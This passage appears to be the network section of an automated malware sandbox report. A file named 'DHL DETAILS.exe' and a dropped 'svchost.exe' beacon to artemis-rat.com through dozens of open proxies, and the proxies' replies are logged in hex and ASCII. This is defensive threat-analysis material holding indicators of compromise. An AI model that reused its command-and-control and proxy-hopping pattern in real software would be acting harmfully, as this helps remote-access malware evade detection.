                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1501192.168.2.5544298.219.179.237156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.437298059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1502192.168.2.55304572.206.181.105649356352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.437463045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1503192.168.2.55448091.134.140.160119466352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.437535048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1504192.168.2.55443623.137.248.197806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.437618971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1505192.168.2.554430194.247.173.1780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.438906908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1506192.168.2.55444894.131.64.157583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.446536064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1507192.168.2.554428103.231.78.36806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.450392962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1508192.168.2.554433202.150.1.87806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.461380959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1509192.168.2.54994051.15.133.214163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.462358952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.998894930 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1510192.168.2.554452177.93.45.1549996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.474082947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.224093914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.037106037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.723858118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.833235979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.879956007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.943003893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.146298885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1511192.168.2.55443747.100.236.2380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.477490902 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:19.844887018 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1512192.168.2.553877198.12.255.193227856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.484986067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.567560911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.567727089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.568625927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1513192.168.2.554566104.16.106.154806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.491338968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.645369053 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1514192.168.2.549904140.227.204.7031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.506524086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.839920044 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1515192.168.2.55445094.130.94.45806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.522171021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1516192.168.2.554605199.188.93.21490006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.523777008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1517192.168.2.554456219.243.212.11880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.544459105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.882349968 CET22INHTTP/1.1 502 ERROR


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1518192.168.2.554442138.36.199.1441536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.544791937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1519192.168.2.554455153.19.91.77806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.546441078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.333125114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.333427906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.333359003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.239301920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.146692038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.146233082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1520192.168.2.5544385.44.42.115583866352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.552732944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1521192.168.2.553166191.7.208.103315766352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.552901983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1522192.168.2.55456938.162.23.12731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.556582928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.018096924 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1523192.168.2.55457294.131.60.199583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.562110901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1524192.168.2.55434694.131.59.2415837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.604955912 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
